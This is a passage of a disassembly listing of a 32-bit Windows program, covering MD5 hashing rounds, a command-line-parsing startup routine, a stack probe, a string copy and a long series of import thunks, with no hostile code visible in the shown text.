mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB8E
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB8E
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB8E
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB8E
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB8E
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB8E
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB8E
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB8E
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB8E
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB8E
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB8E
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB8E
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB8E
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB8E
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB95
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB95
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB95
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB95
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB95
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB95
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB95
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB95
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB95
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB95
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB95
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB95
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB95
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB95
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB95
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB95
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_446C94
add [edi], eax
mov eax, dword_446C98
add [edi+4], eax
mov eax, dword_446C9C
add [edi+8], eax
mov eax, dword_446CA0
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_40BBC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C410 proc near ; CODE XREF: sub_409847+D90�p
var_1C = dword ptr -1Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 1Ch
fnstcw [ebp+var_2]
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [esp+1Ch+var_1C]
mov eax, [esp+1Ch+var_1C]
fldcw [ebp+var_2]
leave
retn
sub_40C410 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C434 proc near ; CODE XREF: sub_401219+66�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_40C4FC ; GetCommandLineA
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_40C468
push 22h
mov eax, edi
inc eax
push eax
call sub_40CA60
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_40C483
mov edi, eax
inc edi
jmp short loc_40C460
; ---------------------------------------------------------------------------
loc_40C45F: ; CODE XREF: sub_40C434+2F�j
inc edi
loc_40C460: ; CODE XREF: sub_40C434+29�j
cmp byte ptr [edi], 20h
jz short loc_40C45F
jmp short loc_40C483
; ---------------------------------------------------------------------------
loc_40C467: ; CODE XREF: sub_40C434+3E�j
inc edi
loc_40C468: ; CODE XREF: sub_40C434+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C474
cmp eax, 20h
jnz short loc_40C467
loc_40C474: ; CODE XREF: sub_40C434+39�j
jmp short loc_40C477
; ---------------------------------------------------------------------------
loc_40C476: ; CODE XREF: sub_40C434+4D�j
inc edi
loc_40C477: ; CODE XREF: sub_40C434:loc_40C474�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C483
cmp eax, 20h
jz short loc_40C476
loc_40C483: ; CODE XREF: sub_40C434+24�j
; sub_40C434+31�j ...
push 0
call sub_40C550 ; GetModuleHandleA
push 1
push edi
push 0
push eax
call sub_40A766
pop edi
leave
retn
sub_40C434 endp
; =============== S U B R O U T I N E =======================================
sub_40C498 proc near ; CODE XREF: sub_401334+8�p
; sub_402A4D+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_40C499: ; CODE XREF: sub_40C498+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_40C499
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_40C498 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40C4B8 proc near ; CODE XREF: sub_401B9A+CA�p
; sub_4053A1+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_40C4B8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4E4 proc near ; CODE XREF: sub_40A766+360�p
jmp ds:dword_447374
sub_40C4E4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4F0 proc near ; CODE XREF: sub_4062CD+152�p
; sub_408BE4+114�p
jmp ds:dword_447378
sub_40C4F0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4FC proc near ; CODE XREF: sub_40C434+5�p
jmp ds:dword_44737C
sub_40C4FC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C508 proc near ; CODE XREF: .text:00401969�p
; sub_401A36+33�p ...
jmp ds:dword_447380
sub_40C508 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C514 proc near ; CODE XREF: sub_401334+29�p
; sub_4015EB+E�p ...
jmp ds:dword_447384
sub_40C514 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C520 proc near ; CODE XREF: sub_401A36+6F�p
; sub_409847+6F7�p
jmp ds:dword_447388
sub_40C520 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C52C proc near ; CODE XREF: sub_40847D+FF�p
jmp ds:dword_44738C
sub_40C52C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C538 proc near ; CODE XREF: sub_401334:loc_4013FF�p
; .text:004019A5�p ...
jmp ds:dword_447390
sub_40C538 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C544 proc near ; CODE XREF: sub_403AA3+148�p
; sub_404194+5E�p ...
jmp ds:dword_447394
sub_40C544 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C550 proc near ; CODE XREF: sub_40223C+13�p
; sub_402572+12B�p ...
jmp ds:dword_447398
sub_40C550 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C55C proc near ; CODE XREF: sub_401334+8F�p
; sub_401A36+C6�p ...
jmp ds:dword_44739C
sub_40C55C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C568 proc near ; CODE XREF: sub_40223C+2B�p
; sub_40223C+40�p ...
jmp ds:dword_4473A0
sub_40C568 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C574 proc near ; CODE XREF: sub_401334+10�p
; sub_401806+7B�p ...
jmp ds:dword_4473A4
sub_40C574 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C580 proc near ; CODE XREF: sub_4039D6+37�p
; sub_404194+DF�p ...
jmp ds:dword_4473A8
sub_40C580 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C58C proc near ; CODE XREF: sub_405601+121�p
; sub_408BE4+18�p
jmp ds:dword_4473AC
sub_40C58C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C598 proc near ; CODE XREF: sub_401806+34�p
; sub_401D14+E8�p ...
jmp ds:dword_4473B0
sub_40C598 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5A4 proc near ; CODE XREF: sub_4015EB:loc_401660�p
; sub_401806+73�p ...
jmp ds:dword_4473B4
sub_40C5A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5B0 proc near ; CODE XREF: sub_404194+97�p
; sub_40A766+F1�p
jmp ds:dword_4473B8
sub_40C5B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5BC proc near ; CODE XREF: sub_4039D6+71�p
jmp ds:dword_4473BC
sub_40C5BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5C8 proc near ; CODE XREF: sub_404194+166�p
; sub_409847+AF5�p ...
jmp ds:dword_4473C0
sub_40C5C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5D4 proc near ; CODE XREF: sub_403449+71�p
; sub_4036F2+55�p ...
jmp ds:dword_4473C4
sub_40C5D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5E0 proc near ; CODE XREF: sub_4034D8+94�p
; .text:00403926�p
jmp ds:dword_4473C8
sub_40C5E0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5EC proc near ; CODE XREF: sub_4034D8+74�p
; .text:004038FC�p
jmp ds:dword_4473CC
sub_40C5EC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5F8 proc near ; CODE XREF: sub_402A4D+20C�p
jmp ds:dword_4473D0
sub_40C5F8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C604 proc near ; CODE XREF: sub_4062CD+461�p
; sub_40A766+2D9�p
jmp ds:dword_4473D4
sub_40C604 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C610 proc near ; CODE XREF: sub_4062CD+4D�p
jmp ds:dword_4473D8
sub_40C610 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C61C proc near ; CODE XREF: sub_402A4D+1CB�p
jmp ds:dword_4473DC
sub_40C61C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C628 proc near ; CODE XREF: sub_402A4D+606�p
jmp ds:dword_4473E0
sub_40C628 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C634 proc near ; CODE XREF: sub_4015EB+9�p
; sub_401806:loc_401831�p ...
jmp ds:dword_4473E4
sub_40C634 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C640 proc near ; CODE XREF: sub_402A4D+B7�p
jmp ds:dword_4473E8
sub_40C640 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C64C proc near ; CODE XREF: sub_401A36+85�p
; sub_40518F+6A�p ...
jmp ds:dword_4473EC
sub_40C64C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C658 proc near ; CODE XREF: sub_40518F+B3�p
; sub_405601+85�p ...
jmp ds:dword_4473F0
sub_40C658 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C664 proc near ; CODE XREF: sub_40A704+25�p
jmp ds:dword_4473F4
sub_40C664 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C670 proc near ; CODE XREF: sub_40518F+25�p
jmp ds:dword_4473F8
sub_40C670 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C67C proc near ; CODE XREF: sub_401334+42�p
; sub_401A36+2C�p ...
jmp ds:dword_4473FC
sub_40C67C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C688 proc near ; CODE XREF: sub_401334+7F�p
; sub_401A36+B2�p
jmp ds:dword_447400
sub_40C688 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C694 proc near ; CODE XREF: sub_40107A+13�p
jmp ds:dword_447404
sub_40C694 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6A0 proc near ; CODE XREF: sub_402A4D+50D�p
; sub_4088D5+6F�p
jmp ds:dword_447408
sub_40C6A0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6AC proc near ; CODE XREF: sub_4052EF+5E�p
; sub_408189+1D4�p ...
jmp ds:dword_44740C
sub_40C6AC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6B8 proc near ; CODE XREF: sub_40847D+130�p
jmp ds:dword_447410
sub_40C6B8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6C4 proc near ; CODE XREF: sub_40A766+528�p
jmp ds:dword_447414
sub_40C6C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6D0 proc near ; CODE XREF: sub_4062CD+373�p
; sub_4062CD+3AD�p
jmp ds:dword_447418
sub_40C6D0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6DC proc near ; CODE XREF: sub_4062CD+5A8�p
; sub_408BE4+1EA�p
jmp ds:dword_44741C
sub_40C6DC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6E8 proc near ; CODE XREF: sub_4087C3+19�p
jmp ds:dword_447420
sub_40C6E8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6F4 proc near ; CODE XREF: sub_4087F1+18�p
jmp ds:dword_447424
sub_40C6F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C700 proc near ; CODE XREF: sub_402A4D+54C�p
jmp ds:dword_447428
sub_40C700 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C70C proc near ; CODE XREF: sub_4062CD+2D6�p
; sub_408BE4+1C3�p
jmp ds:dword_44742C
sub_40C70C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C718 proc near ; CODE XREF: sub_40692E+38�p
jmp ds:dword_447430
sub_40C718 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C724 proc near ; CODE XREF: sub_403AA3+198�p
; sub_404194+2DB�p ...
jmp ds:dword_447434
sub_40C724 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C730 proc near ; CODE XREF: sub_403AA3+111�p
; sub_403C5F+2DF�p ...
jmp ds:dword_447438
sub_40C730 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C73C proc near ; CODE XREF: sub_401B9A+B0�p
; sub_405527+1C�p ...
jmp ds:dword_44743C
sub_40C73C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C748 proc near ; CODE XREF: sub_40692E+17�p
jmp ds:dword_447440
sub_40C748 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C754 proc near ; CODE XREF: sub_40801C+38�p
; sub_40A766+816�p
jmp ds:dword_447444
sub_40C754 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C760 proc near ; CODE XREF: sub_404194+1D8�p
; sub_4062CD+483�p ...
jmp ds:dword_447448
sub_40C760 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C76C proc near ; CODE XREF: sub_4062CD+3CD�p
; sub_406A9A+AB�p ...
jmp ds:dword_447454
sub_40C76C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C778 proc near ; CODE XREF: sub_408E89+6A�p
; sub_40B143+F7�p ...
jmp ds:dword_447458
sub_40C778 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C784 proc near ; CODE XREF: sub_4062CD+353�p
jmp ds:dword_44745C
sub_40C784 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C790 proc near ; CODE XREF: sub_408DEF+19�p
; sub_408DEF+8D�p
jmp ds:dword_447460
sub_40C790 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C79C proc near ; CODE XREF: sub_408DEF+49�p
jmp ds:dword_447464
sub_40C79C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7A8 proc near ; CODE XREF: sub_408E89+9A7�p
; sub_40B01B+47�p ...
jmp ds:dword_447468
sub_40C7A8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7B4 proc near ; CODE XREF: sub_406E2B+81�p
jmp ds:dword_44746C
sub_40C7B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7C0 proc near ; CODE XREF: sub_40A766+47A�p
jmp ds:dword_447470
sub_40C7C0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7CC proc near ; CODE XREF: sub_40A766+4AA�p
jmp ds:dword_447474
sub_40C7CC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7D8 proc near ; CODE XREF: sub_40A766+852�p
jmp ds:dword_447478
sub_40C7D8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7E4 proc near ; CODE XREF: sub_40A766+4D8�p
jmp ds:dword_44747C
sub_40C7E4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7F0 proc near ; CODE XREF: sub_40B143+3B4�p
; sub_40B143+443�p ...
jmp ds:dword_447480
sub_40C7F0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7FC proc near ; CODE XREF: sub_40A766+8A5�p
jmp ds:dword_447484
sub_40C7FC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C808 proc near ; CODE XREF: sub_408E89+8AE�p
; sub_408E89+8E9�p ...
jmp ds:dword_447488
sub_40C808 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C814 proc near ; CODE XREF: sub_408E89+8CA�p
; sub_408E89+90B�p ...
jmp ds:dword_44748C
sub_40C814 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C820 proc near ; CODE XREF: sub_40457C�p
jmp ds:dword_447490
sub_40C820 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C82C proc near ; CODE XREF: sub_404586+1E�p
jmp ds:dword_447494
sub_40C82C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C838 proc near ; CODE XREF: sub_404527+27�p
jmp ds:dword_447498
sub_40C838 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C844 proc near ; CODE XREF: sub_40A766+86F�p
jmp ds:dword_44749C
sub_40C844 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C850 proc near ; CODE XREF: sub_40A766+888�p
jmp ds:dword_4474A0
sub_40C850 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C85C proc near ; CODE XREF: sub_408E89+1EE�p
; sub_408E89+32B�p ...
jmp ds:dword_4474A4
sub_40C85C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C868 proc near ; CODE XREF: sub_404FEF+6E�p
; sub_404FEF+E1�p ...
jmp ds:dword_4474A8
sub_40C868 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C874 proc near ; CODE XREF: sub_40B143+220�p
jmp ds:dword_4474AC
sub_40C874 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C880 proc near ; CODE XREF: sub_408E89+58�p
; sub_40B143+873�p
jmp ds:dword_4474B0
sub_40C880 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C88C proc near ; CODE XREF: sub_408E89+AC�p
; sub_408E89+126�p ...
jmp ds:dword_4474B4
sub_40C88C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C898 proc near ; CODE XREF: sub_40B143+237�p
; sub_40B143+775�p
jmp ds:dword_4474B8
sub_40C898 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8A4 proc near ; CODE XREF: sub_40B143+195�p
jmp ds:dword_4474BC
sub_40C8A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8B0 proc near ; CODE XREF: sub_40B143+898�p
jmp ds:dword_4474C0
sub_40C8B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
